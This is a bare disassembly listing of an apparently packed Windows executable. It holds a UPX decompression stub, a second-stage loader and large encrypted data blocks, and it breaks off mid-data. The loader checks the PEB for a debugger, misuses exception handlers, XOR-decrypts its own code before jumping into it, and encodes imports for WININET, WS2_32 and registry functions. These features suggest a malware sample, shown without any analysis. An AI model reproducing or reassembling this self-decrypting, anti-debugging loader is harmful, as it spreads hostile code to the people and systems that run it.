3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0) db 90h db 0FFh, 2 dup(0) align 10h pusha mov esi, offset dword_31426000 lea edi, [esi-5000h] push edi or ebp, 0FFFFFFFFh jmp short loc_31427BD2 ; --------------------------------------------------------------------------- align 8 loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9j mov al, [esi] inc esi mov [edi], al inc edi loc_31427BCE: ; CODE XREF: UPX1:31427C66j ; UPX1:31427C7Dj add ebx, ebx jnz short loc_31427BD9 loc_31427BD2: ; CODE XREF: UPX1:31427BC0j mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427BD9: ; CODE XREF: UPX1:31427BD0j jb short loc_31427BC8 mov eax, 1 loc_31427BE0: ; CODE XREF: UPX1:31427BEFj ; UPX1:31427BFAj add ebx, ebx jnz short loc_31427BEB mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427BEB: ; CODE XREF: UPX1:31427BE2j adc eax, eax add ebx, ebx jnb short loc_31427BE0 jnz short loc_31427BFC mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31427BE0 loc_31427BFC: ; CODE XREF: UPX1:31427BF1j xor ecx, ecx sub eax, 3 jb short loc_31427C10 shl eax, 8 mov al, [esi] inc esi xor eax, 0FFFFFFFFh jz short loc_31427C82 mov ebp, eax loc_31427C10: ; CODE XREF: UPX1:31427C01j add ebx, ebx jnz short loc_31427C1B mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427C1B: ; CODE XREF: UPX1:31427C12j adc ecx, ecx add ebx, ebx jnz short loc_31427C28 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427C28: ; CODE XREF: UPX1:31427C1Fj adc ecx, ecx jnz short loc_31427C4C inc ecx loc_31427C2D: ; CODE XREF: UPX1:31427C3Cj ; UPX1:31427C47j add ebx, ebx jnz short loc_31427C38 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427C38: ; CODE XREF: UPX1:31427C2Fj adc ecx, ecx add ebx, ebx jnb short loc_31427C2D jnz short loc_31427C49 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31427C2D loc_31427C49: ; CODE XREF: UPX1:31427C3Ej add ecx, 2 loc_31427C4C: ; CODE XREF: UPX1:31427C2Aj cmp ebp, 0FFFFF300h adc ecx, 1 lea edx, [edi+ebp] cmp ebp, 0FFFFFFFCh jbe short loc_31427C6C loc_31427C5D: ; CODE XREF: UPX1:31427C64j mov al, [edx] inc edx mov [edi], al inc edi dec ecx jnz short loc_31427C5D jmp loc_31427BCE ; --------------------------------------------------------------------------- align 4 loc_31427C6C: ; CODE XREF: UPX1:31427C5Bj ; UPX1:31427C79j mov eax, [edx] add edx, 4 mov [edi], eax add edi, 4 sub ecx, 4 ja short loc_31427C6C add edi, ecx jmp loc_31427BCE ; --------------------------------------------------------------------------- loc_31427C82: ; CODE XREF: UPX1:31427C0Cj pop esi mov edi, esi mov ecx, 7Eh loc_31427C8A: ; CODE XREF: UPX1:31427C91j ; UPX1:31427C96j mov al, [edi] inc edi sub al, 0E8h loc_31427C8F: ; CODE XREF: UPX1:31427CB4j cmp al, 1 ja short loc_31427C8A cmp byte ptr [edi], 1 jnz short loc_31427C8A mov eax, [edi] mov bl, [edi+4] shr ax, 8 rol eax, 10h xchg al, ah sub eax, edi sub bl, 0E8h add eax, esi mov [edi], eax add edi, 5 mov eax, ebx loop loc_31427C8F lea edi, [esi+5000h] loc_31427CBC: ; CODE XREF: UPX1:31427CDEj mov eax, [edi] or eax, eax jz short loc_31427D07 mov ebx, [edi+4] lea eax, [eax+esi+7000h] add ebx, esi push eax add edi, 8 call dword ptr [esi+708Ch] xchg eax, ebp loc_31427CD9: ; CODE XREF: UPX1:31427CFFj mov al, [edi] inc edi or al, al jz short loc_31427CBC mov ecx, edi jns short near ptr loc_31427CEA+1 movzx eax, word ptr [edi] inc edi push eax inc edi loc_31427CEA: ; CODE XREF: UPX1:31427CE2j mov ecx, 0AEF24857h push ebp call dword ptr [esi+7090h] or eax, eax jz short loc_31427D01 mov [ebx], eax add ebx, 4 jmp short loc_31427CD9 ; --------------------------------------------------------------------------- loc_31427D01: ; CODE XREF: UPX1:31427CF8j call dword ptr [esi+7094h] loc_31427D07: ; CODE XREF: UPX1:31427CC0j popa jmp loc_31422334 ; --------------------------------------------------------------------------- align 400h UPX1 ends ; Section 3. (virtual address 00008000) ; Virtual size : 00021000 ( 135168.) ; Section size in file : 00021000 ( 135168.) ; Offset to raw data for section: 00008000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX2 segment para public 'CODE' use32 assume cs:UPX2 ;org 31428000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dd 3 dup(0) dd 80C4h, 808Ch, 3 dup(0) dd 80D1h, 809Ch, 3 dup(0) dd 80DEh, 80A4h, 3 dup(0) dd 80E9h, 80ACh, 3 dup(0) dd 80F4h, 80B4h, 3 dup(0) dd 8100h, 80BCh, 5 dup(0) dd 7C801D77h dword_31428090 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_3143B9DB+4Cr ... dd 7C81CDDAh, 0 dd 77DD6BF0h, 0 dd 77C371D3h, 0 dd 7E41A8ADh, 0 dd 42C2C8A1h, 0 dd 71AB9639h, 0 dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h dd 6E65704Fh, 41h, 26h dup(0) ; --------------------------------------------------------------------------- public start start: push 0ED01C390h mov eax, esp call eax xchg eax, ebx pop ebx call loc_31428269 mov esp, [esp+8] ; DATA XREF: sub_314439D7+6w mov eax, 4EBh ; CODE XREF: UPX2:31428219j ; DATA XREF: sub_3143B9DB+6w jmp short near ptr loc_31428214+1 ; --------------------------------------------------------------------------- mov eax, fs:18h mov eax, [eax+30h] movzx eax, byte ptr [eax+2] cmp eax, 0 jnz short locret_31428268 call $+5 pop ebp sub ebp, 402334h mov eax, [ebp+40237Bh] add eax, [ebp+402383h] mov esi, eax mov eax, [ebp+40237Fh] add eax, [ebp+402383h] push eax mov edi, esi xor ecx, ecx loc_31428257: ; CODE XREF: UPX2:31428266j lodsb xor al, [ebp+40238Bh] stosb inc ecx cmp ecx, [ebp+402387h] jl short loc_31428257 locret_31428268: ; CODE XREF: UPX2:3142822Aj retn ; --------------------------------------------------------------------------- loc_31428269: ; CODE XREF: UPX2:3142820Bp sub eax, eax push dword ptr fs:[eax] mov fs:[eax], esp mov eax, 12345678h xchg eax, [ebx] add [eax+0], ah add [eax+7Bh], dh add [edx+31h], al add [esi], bl ; --------------------------------------------------------------------------- dw 0 db 78h ; =============== S U B R O U T I N E ======================================= sub_31428289 proc near ; CODE XREF: UPX2:314282C3p var_1C = byte ptr -1Ch var_8 = dword ptr -8 ; FUNCTION CHUNK AT 314282EF SIZE 00000045 BYTES pusha push ebp mov ebp, esp call loc_3142829C call sub_31428337 jmp loc_314282EF sub_31428289 endp ; --------------------------------------------------------------------------- loc_3142829C: ; CODE XREF: sub_31428289+4p push dword ptr fs:0 mov fs:0, esp xor ebx, ebx push ebx push ebx push ebx push ebx push 80000000h push ebx push ebx push ebx push ebx push ebx push 10h push ebx push 800h call sub_31428289 xor [ecx], esi fld tbyte ptr [eax+0] add [ecx], al add [eax+0], ch ; --------------------------------------------------------------------------- dw 0 dd 406880h, 680000h, 53800000h, 68535353h, 8, 8C15FF53h db 80h, 42h, 31h ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_31428289 loc_314282EF: ; CODE XREF: sub_31428289+Ej sub ebx, ebx sub ecx, ecx mov cl, 21h loc_314282F5: ; CODE XREF: sub_31428289+6Dj inc ebx loop loc_314282F5 call sub_31428334 add ecx, 47h push ecx mov edx, 243Ch loc_31428309: ; CODE XREF: sub_31428289+90j mov al, [ecx] xor ax, bx mov [ecx], al add ecx, 1 sub edx, 1 cmp edx, 0 ja short loc_31428309 pop ecx mov esp, fs:0 pop dword ptr fs:0 lea ebp, [esp+20h+var_1C] leave mov [esp+20h+var_8], ecx popa jmp ecx ; END OF FUNCTION CHUNK FOR sub_31428289 ; =============== S U B R O U T I N E ======================================= sub_31428334 proc near ; CODE XREF: sub_31428289+6Fp pop ecx push ecx retn sub_31428334 endp ; =============== S U B R O U T I N E ======================================= sub_31428337 proc near ; CODE XREF: sub_31428289+9p arg_C = dword ptr 10h mov ecx, [esp+arg_C] xor eax, eax pop dword ptr [ecx+0B8h] retn sub_31428337 endp ; sp-analysis failed ; --------------------------------------------------------------------------- dd 2121C9B1h, 25AA2121h, 0AA1D605h, 21212105h, 0A8A12121h dd 21088DB9h, 57DAA21h, 0DD0C5525h, 9191A878h, 0A8212108h dd 21089599h, 0E99A121h, 0C9212105h, 0B9222C54h, 21210511h dd 0DE237AAAh, 0AA29CA12h, 210510B9h, 7A12DE21h, 4DA0B474h dd 21242505h, 0C2A02121h, 0DEDED121h, 3127CCA0h, 5DAA2161h dd 94AC2505h, 2161151Dh, 21212198h, 0A085D221h, 49756F5Ah dd 2C545248h, 0AC1D62AAh, 0A0473925h, 55647119h, 21CAA029h dd 54212120h, 5971AAC3h, 53AAF222h, 396BAA01h, 8C70D222h dd 59A0E222h, 446621DEh, 0A03A5455h, 53712259h, 3354424Eh dd 602659A0h, 54534545h, 2A59A028h, 21525244h, 0F6C32455h dd 8E27C78h, 53AA052Dh, 0D2227805h, 6F25962Eh, 223D5BAAh dd 0A615AADAh, 2DC9D222h, 62212121h, 44524E4Dh, 454F4069h dd 7221444Dh, 0A4A8F7DEh, 2161141Dh, 21212CC9h, 44536221h dd 64445540h, 554F4457h, 0DE722160h, 61A4A8F7h, 0C9216114h dd 2121212Ch, 6D554466h, 64555240h, 534E5353h, 0F7DE7221h dd 1465A4A8h, 51C92161h, 0A4212121h, 710055E1h, 1465B4DEh dd 0E1A42161h, 0A4AC3154h, 216130F3h, 0C9DE71ABh, 2121214Fh dd 0B4DE5DCAh, 2161141Dh, 1510A4D6h, 21212161h, 3F55A121h dd 151494ACh, 5DAA2161h, 84852505h, 1893BCAAh, 94AA2161h dd 21611897h, 189B9CAAh, 0E27C2161h, 4B214B7Bh, 4B214B21h dd 21204921h, 0E5AA2125h, 4B71214Bh, 0DEE5AA2Dh, 7E7577C3h dd 12212112h, 0DEFBC9E8h, 0B4ACDEDEh, 21613080h, 71707073h dd 1461B4DEh, 0E5A22161h, 0D3ABE201h, 21037E98h, 61311121h dd 0D8C3F723h, 0C66E5E2h, 0B9B524EDh, 0D60827Dh, 99D55158h dd 0FCADC4DEh, 723571EDh, 89317038h, 0B3DC628Dh, 0A645109Ch dd 794CCF68h, 0D897B2FDh, 0DBC79E25h, 68A6031Dh, 398C8FB8h dd 1E6B233Dh, 4A9654CBh, 20E4215Dh, 0F9C079D8h, 32708C7Dh dd 0AAD55158h, 0B198EC94h, 48353198h, 0CA5BA9A3h, 264A518Dh dd 69503508h, 269D70EDh, 99105F2h, 5EDE91CDh, 6AE58BC9h dd 69B599EEh, 0CC0CC93Dh, 59D5E45Dh, 0A98CEF75h, 46F55B6Dh dd 0C9F0C9E8h, 9615944Dh, 16DB90D9h, 4CB8E652h, 0C94551BDh dd 0ADACBE06h, 0A865A197h, 7965B100h, 8AD00CFDh, 0EA55D1DFh dd 0EA471E78h, 853ED1C1h, 89B6C957h, 64005C54h, 5AE56107h dd 3009BAC6h, 0CE3B112Ah, 9ABD4651h, 1625605Dh, 0B9002138h dd 0E9C1C2BDh, 5D1A9108h, 0D69A5F3Fh, 5375DB7Ah, 0D45E9FCh dd 193D11CDh, 96A5E0DDh, 3980A1B8h, 4645443Dh, 0A66B5489h dd 0F9E54BE2h, 0BDF53105h, 48C56B7Dh, 0F3821DA5h, 0E84D315Ch dd 63570ADh, 89301128h, 0D91F398Dh, 0BC9AA19Ch, 393584BDh dd 9458415h, 0E70178CDh, 69CF1E22h, 13BF1274h, 0F5103E37h dd 0B2959138h, 1466E2ECh, 0B9B5041Dh, 0BE410E7Dh, 712AEEB3h dd 0E925615Bh, 0B57125E3h, 5CFA41F1h, 0D9556405h, 3E161410h dd 0F046B1ADh, 3C953C70h, 12E4918Dh, 6BE3094Eh, 0C436F12Dh dd 49C5F4C5h, 5A11DE0Dh, 221ADEE3h, 0F9C0E5E8h, 88B5FE7Dh dd 0AA4094C2h, 6CAE611Dh, 0F9754445h, 46043142h, 9926B308h dd 0F1E02A9Dh, 0C675F1D8h, 8CCA808Dh, 1915A224h, 5C796C56h dd 7056F16Dh, 0C684B0C2h, 19A62788h, 5417C91Dh, 478CE92h dd 89853733h, 99BFDEC6h, 99DAB8ABh, 0FAD4F2A9h, 300601D7h dd 0B3153BDAh, 0B6D02C85h, 8075F1F8h, 94581E1h, 1DD84546h dd 965A1F90h, 0F41E97D2h, 49858C39h, 0F2F3D10Dh, 2E16690h dd 0DF59D55Fh, 0E33EE3D6h, 0F01B794Dh, 25AE615Dh, 3DBE71C7h dd 0C96D41D7h, 0B31D518Dh, 4337F0DDh, 0AC8AE1E3h, 905B41Dh dd 59911295h, 69CC2FB5h, 13617A2Dh, 23494A3Dh, 3395BB4Dh dd 0A98F731Fh, 0B99CFF05h, 0D8C56B7Dh, 6685EE27h, 0A91085C8h dd 7C6C2EADh, 0EE814E42h, 54EAAE70h, 6975A128h, 330108EDh dd 0E6CE81FDh, 0F4D4343Eh, 69E5F1DDh, 6DF974A0h, 0A97AC17Dh dd 41754480h, 56B7215Dh, 0F9C0ADF8h, 89D3E97Dh, 0F699114Dh dd 99500A32h, 8F5C03FDh, 0AE602DD4h, 0B57407E8h, 2924C4E8h dd 71E04EBDh, 8045C1C8h, 5960DD48h, 3F1B1DDh, 864A9B0Dh dd 9B02DA8h, 655540Dh, 0C3731E68h, 32A3676Fh, 0DBC46BA9h dd 99D500A5h, 0AD40325Dh, 9E4013C8h, 0BF6C33EDh, 0BE703DE4h dd 0D633A1F8h, 7940FD78h, 5F810AFDh, 4F05C79Bh, 0B9301E8Ah dd 0FAB5B118h, 0B6D2D1F9h, 19A0ED98h, 0C3E54B1Dh, 0C960CE6Fh dd 30C54148h, 99D51065h, 60C44ACAh, 0AE6155A1h, 0FCA9D442h dd 2F2651CDh, 1F59041Eh, 6D75B1ADh, 0B9D07EAAh, 9C55D1F8h dd 2FF9951Dh, 0BB10FAEh, 6DF13ED3h, 3395BB05h, 170DE37h dd 3CF57158h, 1A1975BDh, 99D12CA5h, 78EC525Dh, 7C0C414Eh dd 0C9457781h, 189479F8h, 2965AC33h, 6F25E5BDh, 5A15D1ACh dd 2C3D0432h, 0A920E19Dh, 86BA8574h, 0C68DE549h, 19A3ED88h dd 5449C91Dh, 46A6CE92h, 0C9F03DE8h, 184DFA4Dh, 0E9244999h dd 6CCA26ADh, 0C9457481h, 26EEB464h, 292C2C62h, 392DE9B5h dd 945A833h, 19559CA8h, 69A5E1DCh, 79B5F12Dh, 4985C13Dh dd 0A6C6875Ch, 0E9D06988h, 15AC9A6Dh, 72B0C1F9h, 0C516FFAFh dd 8C56001Fh, 9C5810E3h, 0A3670ED9h, 0AA6132E8h, 1B56F6C1h dd 4B1CE7B2h, 6545F489h, 7527E5BEh, 2AA58FB8h, 0DD4945Fh dd 25EC8758h, 1A959068h, 0DD84446Fh, 0D59C7708h, 0F9A44C18h dd 0FEBB783Dh, 9B66611Ch, 9C4110C8h, 0AA6A33EDh, 986622E8h dd 4C17E29Dh, 6B10C58Ch, 7D2AEC98h, 6B3DC5A8h, 69C180B8h dd 18D0836Eh, 21D1A449h, 3DF4B47Fh, 0CC97621Dh, 0ED90450Ch dd 0E1A96E12h, 0AAA57D28h, 884B326Fh, 965D02DDh, 0B14041C9h dd 0B14125E4h, 4D04C4EFh, 551CF7EDh, 642CD598h, 4A3AC5A8h dd 0CD192A4h, 14DCA540h, 2CC2C158h, 35FC9779h, 0DD916078h dd 0CC97581Fh, 0C8B66409h, 0EDB0564Dh, 8C49081Bh, 9C4F18FEh dd 0BD6006BDh, 0BC7938CBh, 4C08C8C9h, 4D10F6EDh, 7C21EEB0h dd 781DF4A1h, 0CC985B3h, 1CF2F16Ch, 24E09549h, 35FC977Dh dd 0C4846F78h, 0FEF57008h, 0EC917518h, 0F8856120h, 0E9640929h dd 0AF4114EAh, 0A07633D8h, 9E153FE2h, 4C33D5F8h, 561CC29Fh dd 483DC493h, 783ADDCDh, 0BCCADB9h, 0C7905Fh, 28C8C17Ch dd 3CFC877Dh, 0EF836E6Ah, 0B9905D04h, 0E7A07132h, 0FCB9780Bh dd 99550010h, 0B8521FC4h, 0AC750EBDh, 0B66701E3h, 5A16C4FEh dd 5607E1EDh, 7A36E49Eh, 7013A3FEh, 69D192AFh, 1ADA837Dh dd 7AF6B258h, 21F09F3Fh, 0CCB62169h, 0D59C7719h, 0FDB14018h dd 0ECB7783Fh, 0A8560429h, 8D5022ADh, 0AC6928FBh, 0BC7838D9h dd 4C09F29Dh, 6A75C188h, 6C31F284h, 743CC5A0h, 2FCAB5B8h dd 2DD09D44h, 49E0AC54h, 38F8BF58h, 0CC8C776Dh, 0FF937E1Ah dd 89A06D14h, 0EDA7781Bh, 0A8490028h, 9A5A1DC1h, 0A07716BDh dd 0B05334F9h, 6765C4F1h, 5311F099h, 5931F288h, 7023F8BFh dd 0CC284B1h, 12DAA55Eh, 785AF58h, 3CE79279h, 0EF80557Ch dd 0B9905D04h, 0FB867533h, 0FCA17028h, 8A4A130Dh, 0F94602C8h dd 0BB4635F3h, 0BC6130E8h, 4A0AD3CDh, 7C06C288h, 7D0B8185h dd 7830E38Eh, 0CF684A9h, 16DC854Eh, 3DCBC153h, 0FE5B040h dd 0E6924474h, 0DA90620Bh, 0E7AA6809h, 0D6A15F4Dh, 0AF4B042Dh dd 0F9501DC4h, 0B94A35F3h, 0AB453FE8h, 5A00C2F2h, 521AE59Eh dd 4745EF98h, 7627C1B9h dd 1DC684A9h, 0DC7987Bh, 4E9A048h, 2BFABC68h, 0DDAB2164h dd 0CD9C433Ah, 0FBAC5718h, 0F5B46439h, 86480410h, 0AB3508DFh dd 0A7502DC9h, 0BD7A32E4h, 5B11F2F8h, 6D12DF84h, 7A2BC092h dd 6B21C2A4h, 69C28FB4h, 2AF4A27Ah, 3DF7A049h, 3A95A178h dd 0CC964E71h, 0D2965E1Eh, 0EAC57518h, 0FCBB7F22h, 8E25153Eh dd 965D05C8h, 0B06735CEh, 0BC7830E3h, 4A00D39Dh, 5C06B19Bh dd 7A45E593h, 7C3EF2A2h, 7ECE1A9h, 17C79459h, 25C6B558h dd 11F0A262h, 0C5814F7Ch, 0D7BC3108h, 0E7B76409h, 0FC926528h dd 874A2229h, 8D5614C3h, 0BD5625D8h, 0D97025ECh, 4C11CFD4h dd 4D10DF9Fh, 6720F1B2h, 771C918Ch, 7D784A9h, 9FA8548h dd 3BD0AF58h, 10959061h, 0DB805573h, 0EB815403h, 0CFA16018h dd 99B07D24h, 0A873251Ch, 0CB0638FDh, 85490593h, 0BE70038Dh dd 5A0ACDDEh, 4010FA88h, 6E20D3FDh, 7730E182h, 2CDC8496h dd 2BB5B055h, 3CD4A658h, 0FECA368h, 0CC904D7Ch, 0B9B44928h dd 0DAA2642Fh, 0F8836528h, 0AC401431h, 7A3530D5h, 12E4454h dd 0D91539DCh, 65E8499Dh, 391FB2C9h, 59148497h, 9250FB9Eh dd 0BD2EB111h, 39DFA57Dh, 0B6D6936Ch, 19A02198h, 0A521A21Dh dd 8C01A492h, 4D46013Dh, 1482D245h, 0A930D0D8h, 0A9CA42ADh dd 0C76F41D7h, 0ECB1C472h, 0E9E0A1DDh, 39E535E2h, 611581FDh dd 1955F803h, 69CF3556h, 39DF3DA6h, 5985C155h, 0B97BB0Dh dd 678D2177h, 0D3F53104h, 0D996507Dh, 0AC3184B2h, 0B07A611Dh dd 0CC09E452h, 368041FDh, 549E0DF9h, 2925B415h, 0ACF8BD0Eh dd 90591FDh, 4A0240CEh, 0EC2E3322h, 79F5C4F9h, 6A114EB0h dd 0D7DD10Dh, 221ADEE2h, 0F9C0D9E8h, 684A8C7Dh, 71D5116Eh dd 16DA9E1Eh, 0CCEDF426h, 468841FDh, 0D9157265h, 0D69A9375h dd 0E5F03A12h, 8C45C1C8h, 945EE50Dh, 69861452h, 86A8192Dh dd 8E0E3EC2h, 0B1C01252h, 0A9E5211Dh, 0AD18B030h, 0BAC54167h dd 37509C84h, 0B8252140h, 0A96420F9h, 5CFA10ECh, 0D95564E1h dd 0D641A51Ah, 79408D78h, 0D87DCFDh, 19BDC4CDh, 34A5E1DDh dd 63F61CACh, 0B6EFC17Dh, 439B4480h, 0FBB5215Dh, 0B9D111A0h dd 4D460157h, 1C127741h, 0E9657B09h, 7CF25160h, 0C9455BEBh dd 0D93F51A9h, 280F62C0h, 0A8AB087h, 0F641F202h, 6D9514D8h dd 69AE892Dh, 0A93EF12Dh, 75D5C266h, 43E76480h, 136E215Dh dd 0B9F53061h, 88CD8BF6h, 61D6114Dh, 6245AA76h, 98938266h dd 2B4244C9h, 5AD7BA78h, 0A232AE5Ah, 0F5FEE239h, 492FD5ADh dd 0E63FC39Ch, 5C557422h, 0BD36F16Dh, 3D104A31h, 72959138h dd 0AE0FA2CAh, 0B99F36AAh, 0DE4C0195h, 83BFD24Eh, 0E92C8905h dd 0BBB871ADh, 0FBEBDCh, 0B0D6A1F8h, 6953E708h, 31F1B4EDh dd 9CCCC3F5h, 1915A78Bh, 3C66032Ah, 79B5F1C5h, 0A4049C3Dh dd 59D5CA04h, 9FAFBC96h, 0C576312Dh, 86C50959h, 99D5A8C9h dd 0E1C9E05Dh, 0AD3571AFh, 0C90445D5h, 4980AE8Dh, 0A265E1A8h dd 1DF13C11h, 94580F9h, 0F155FB9Dh, 69A5E1D9h, 79E1A37Bh dd 0C5103E6Ah, 6A959138h, 0AD72ACD4h, 0E8F5316Ch, 0D8C76B2Ch dd 99BD1027h, 0BB65615Dh, 0CC69E452h, 4C9341FDh, 894E257Bh dd 2861C9C9h, 0C622B1EDh, 0B65A549h, 8CAA91CDh, 69E5D7F5h dd 0D757474h, 1991222Bh, 59FF0586h, 0FFB2704Fh, 8C39A492h dd 0C9C013Dh, 0CF05648Dh, 0DC19F4A2h, 0AEB871EDh, 0A35213F9h dd 4E9809C9h, 2965A099h, 53B58246h, 0A2B6D8EDh, 4905C19Dh dd 3BF5B18Dh, 4CD164D2h, 8D04C17Dh, 5995D305h, 0A1C155E2h dd 8FEDA492h, 7696013Dh, 0D9E309D8h, 0EDE73C5Dh, 0F30BF1ADh dd 424340C8h, 9900D500h, 0A47C429Dh, 7965B178h, 5F9482FDh dd 0D9D14332h, 68BA69D2h, 0FDBAF12Dh, 4985C02Dh, 2CAFEF8Dh dd 9765670Dh, 0B8713E6Dh, 9C5017Ch, 68A03173h, 0B91BE01Bh dd 8C723FE4h, 0FCACAFFh, 0F25A50CBh, 290FF053h, 0C626E7BCh dd 49739168h, 0D86EC8CDh, 697A64D2h, 0FC38F12Dh, 49C5DC9Fh dd 55FDD167h, 0F9E5211Dh, 0A960CE3Eh, 0B4C5414Bh, 99D51141h dd 0E99AE452h, 48DC71ADh, 480541BDh, 904701B3h, 8CE0AECBh dd 0BA75B1EDh, 35E9893Bh, 80D19EC0h, 55A5E1DDh, 0D546840Dh dd 0CC8AFB01h, 5995D181h, 89C52CB0h, 98C8114Dh, 0FCB1641Ah dd 0B9E9BD32h, 97A41D28h, 8D5D5152h, 487434C9h, 0E36552F3h dd 41108EB2h, 398AF62Bh, 19FFB0F2h, 0EE5591EAh, 0FC5AB33Fh dd 79F5C491h, 19D5010Eh, 507D815Dh, 0EDE5211Dh, 0D59B4602h dd 89A16012h, 0AFF584B2h, 29A0611Dh, 300647D9h, 0FF4FC434h dd 0B14451CDh, 0A965A39Dh, 6923E0BCh, 3F611402h, 8CD8918Dh dd 69E5FADEh, 2D7CC27Dh, 18D7916Ch, 35002E5Ch, 2EE56128h dd 2C0A1569h, 89853441h, 1455D2B5h, 0E965742Ah, 0AAF688ACh dd 9E5107F2h, 855003CCh, 5B06C8D0h, 5F1AC282h, 6012DD89h dd 6E3AF5A3h, 1CE6BDAEh, 17D0835Fh, 3BE09749h, 37FAB87Eh dd 0D99D6441h, 0DC875E01h, 0E891010Fh, 0EDB0763Fh, 9D560E15h dd 63573ADh, 0C9053E4Dh, 0B667218Ch, 708C8E5h, 5E16C384h dd 7124ED9Ch, 7525BFB4h, 2AECAFDDh, 1FD1D166h, 31FFA859h dd 0C9FA37Fh, 89B7644Eh, 89C7011Bh, 0A9F43148h, 0B9FB3163h dd 0A66F4C67h, 0DF153FE4h, 0BD7728CBh, 31405BF8h, 2965A19Dh dd 8D9830B0h, 0CF45C1E0h, 5940E648h, 0FC5AE1DDh, 79F5C4B9h dd 3D9A29FCh, 0D28BBB31h, 0E9D071A8h, 8559686Dh, 0EFEF7453h dd 842A2FCCh, 54A84228h, 0F97547EDh, 9E073736h, 54B03728h dd 6956CB18h, 0A9F03EEDh, 0F345C1CEh, 95AFD744h, 0D85E1F93h dd 927A132Ch, 0F8004C7Eh, 9959118h, 0A78F2177h, 8C51A492h dd 0F546013Dh, 0ECD11969h, 0E9218976h, 0BF6671ADh, 5CFA41FEh dd 0D9556405h, 0D699E975h, 39725912h, 4F1681FDh, 4A1ACE8Eh dd 0E1301EDDh, 91B5B118h, 0B67A3D0Ch, 0A66687E5h, 0AA68DEE2h dd 51F5717Eh, 89C50176h, 0CB904218h, 0AD0B536Eh, 6353DE1h dd 8930DD28h, 0D91FB98Dh, 5A12A19Dh, 571CC39Dh, 904E789h dd 51C06E9Dh, 0E0A5A1E8h, 3980A5A8h, 0C4B4CE3Dh, 198D3180h dd 0EF60A81Dh, 0E8F5715Bh, 0BC599482h, 0F146110Dh, 0E9256159h dd 0E1D8C420h, 445C41FDh, 99237D30h, 0DFB3499Dh, 0FE134E12h dd 4958E678h, 9AA56ECDh, 29B88878h, 0EC38F12Dh, 49C5DC1Ah dd 58FF855Dh, 0C1B72177h, 39F5316Fh, 0BFF59482h, 5950110Dh dd 64071407h, 0B9282B20h, 0CF6F13BDh, 0C472E400h, 7F31A1DDh dd 6B24E1BDh, 3F711402h, 0E60D918Dh, 2993CD48h, 3430372Dh dd 49858105h, 5995DDE5h, 0E6B6761Dh, 8BC67A2Eh, 0C5894553h dd 540EE4Dh, 7A252168h, 0F93576C5h, 8DB0CCBDh, 80151195h dd 1C991C10h, 689DB1ADh, 0E1BA7E0Bh, 195591C1h, 20EBA88Ah dd 